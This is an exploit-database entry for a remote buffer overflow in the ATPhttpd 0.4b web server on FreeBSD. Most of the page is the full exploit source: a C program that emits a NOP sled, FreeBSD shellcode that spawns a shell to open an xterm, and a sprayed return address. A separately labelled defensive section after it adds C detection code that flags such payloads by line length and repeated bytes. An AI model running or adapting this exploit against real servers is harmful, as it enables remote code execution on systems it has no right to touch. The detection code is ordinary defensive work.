ATPhttpd 0.4b – Remote Buffer Overflow

Vulnerability ID 1053600 Vulnerability type
Published 2002-07-12 Updated 2002-07-12
CVE ID N/A
CNNVD-ID N/A
Platform FreeBSD CVSS score N/A
|Source
https://www.exploit-db.com/exploits/21614
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit
/*
source: http://www.securityfocus.com/bid/5215/info

ATPhttpd is a small webserver designed for high performance. It was developed by Yann Ramin.

There exist several exploitable buffer overflow conditions in ATPhttpd. Remote attackers may leverage these vulnerabilities to gain access on affected servers.
*/

/* atphttpd exploit.
 / The exploit sucks, if you get it wrong the first time the server just dies
 / so I didn't bother adding any offset argument to the exploit. Also if you
 / change the IP addy you may have to change the alignment a little.
 /
 / http://www.badc0ded.com
*/

#include <stdio.h>

#define ret "\x78\xf5\xbf\xbf"
char FreeBSD[]=		 /* stolen lsd-pl.net shellcode	   */
  "\xeb\x25"             /* jmp     <cmdshellcode+39>      */
  "\x59"                 /* popl    %ecx                   */
  "\x31\xc0"             /* xorl    %eax,%eax              */
  "\x50"                 /* pushl   %eax                   */
  "\x68""//sh"           /* pushl   $0x68732f2f            */
  "\x68""/bin"           /* pushl   $0x6e69622f            */
  "\x89\xe3"             /* movl    %esp,%ebx              */
  "\x50"                 /* pushl   %eax                   */
  "\x66\x68""-c"         /* pushw   $0x632d                */
  "\x89\xe7"             /* movl    %esp,%edi              */
  "\x50"                 /* pushl   %eax                   */
  "\x51"                 /* pushl   %ecx                   */
  "\x57"                 /* pushl   %edi                   */
  "\x53"                 /* pushl   %ebx                   */
  "\x89\xe7"             /* movl    %esp,%edi              */
  "\x50"                 /* pushl   %eax                   */
  "\x57"                 /* pushl   %edi                   */
  "\x53"                 /* pushl   %ebx                   */
  "\x50"                 /* pushl   %eax                   */
  "\xb0\x3b"             /* movb    $0x3b,%al              */
  "\xcd\x80"             /* int     $0x80                  */
  "\xe8\xd6\xff\xff\xff" /* call    <cmdshellcode+2>       */
  "/usr/X11R6/bin/xterm -display 127.0.0.1:0;";

int main (void)
{
  int i;
  for (i=0;i<=501;i++) // this would be a good place to change alignment
    printf("\x90");
  printf("%s",FreeBSD);
  for (i=0;i<=100;i++)
    printf("%s",ret);
  printf("\n\n");
  return 0;
}
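
A defender-side check for the payload layout that the program above prints (a long run of 0x90, the shellcode, then a repeated 4-byte return address, all on one line), given here as an added example that is not part of the original advisory or exploit. The thresholds, flag names, function names and sample bytes are assumptions chosen for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Thresholds are assumptions for this example, not ATPhttpd's buffer sizes. */
enum { MAX_LINE = 256, MIN_PAD = 32 };
enum { F_LONG_LINE = 1, F_BYTE_RUN = 2, F_WORD_SPRAY = 4 };

/* Length in bytes of the longest stretch that repeats with period k
   (k = 1: one byte repeated, e.g. a 0x90 sled; k = 4: one 32-bit word). */
size_t longest_period(const unsigned char *p, size_t n, size_t k) {
    size_t best = 0, cur = 0;   /* cur: bytes equal to the byte k positions back */
    for (size_t i = k; i < n; i++) {
        cur = (p[i] == p[i - k]) ? cur + 1 : 0;
        if (cur > best) best = cur;
    }
    return best ? best + k : 0;
}

/* Check the first line of a request (up to '\n') against three heuristics.
   A byte run is also 4-periodic, so a sled sets F_WORD_SPRAY as well. */
int inspect_request(const unsigned char *p, size_t n) {
    const unsigned char *eol = memchr(p, '\n', n);
    size_t line = eol ? (size_t)(eol - p) : n;
    int f = line > MAX_LINE ? F_LONG_LINE : 0;
    if (longest_period(p, line, 1) >= MIN_PAD) f |= F_BYTE_RUN;
    if (longest_period(p, line, 4) >= MIN_PAD) f |= F_WORD_SPRAY;
    return f;
}

/* Constructed sample with the layout the program above prints: 502 x 0x90,
   80 filler bytes in place of the shellcode, 101 copies of a placeholder word. */
size_t make_sample(unsigned char *out) {
    size_t n = 582;
    memset(out, 0x90, 502);
    memset(out + 502, 'A', 80);
    for (int i = 0; i < 101; i++, n += 4)
        memcpy(out + n, "\xef\xbe\xad\xde", 4);
    out[n++] = '\n';
    return n;
}

int main(void) {
    unsigned char bad[1024];
    const char *ok = "GET /index.html HTTP/1.0\r\n\r\n";
    printf("benign=%d ", inspect_request((const unsigned char *)ok, strlen(ok)));
    printf("sample=%d\n", inspect_request(bad, make_sample(bad)));
    return 0;
}
```

The same three signals can be applied in a reverse proxy or IDS rule in front of a legacy server; the length limit alone rejects this payload before it reaches a vulnerable parser.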
